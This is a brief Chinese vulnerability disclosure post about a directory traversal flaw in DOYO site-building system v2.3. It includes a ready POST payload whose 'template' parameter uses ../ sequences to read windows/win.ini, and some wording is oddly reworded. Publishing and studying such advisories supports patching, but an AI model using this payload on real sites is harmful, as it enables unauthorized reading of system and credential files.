DOYO通用建站系统存在通用目录遍历漏洞

破绽描绘

DOYO通用建站系统存在通用目录遍历破绽,问题呈现在POST恳求包里”template”参数存在破绽 aid=19&record_page=1&template=../../../../../../../../../../windows/win.ini
 


 

影响版本

DOYO通用建站系统_v2.3
 


 

破绽复现

访问http://localhost/DOYO/index.php?a=record&c=ajax
修正POST恳求包为:

aid=19&record_page=1&template=../../../../../../../../../../windows/win.ini 

能够访问系统下的win.ini文件。

图片[1]-DOYO通用建站系统存在通用目录遍历漏洞-孤勇者社区

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞6赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像出的0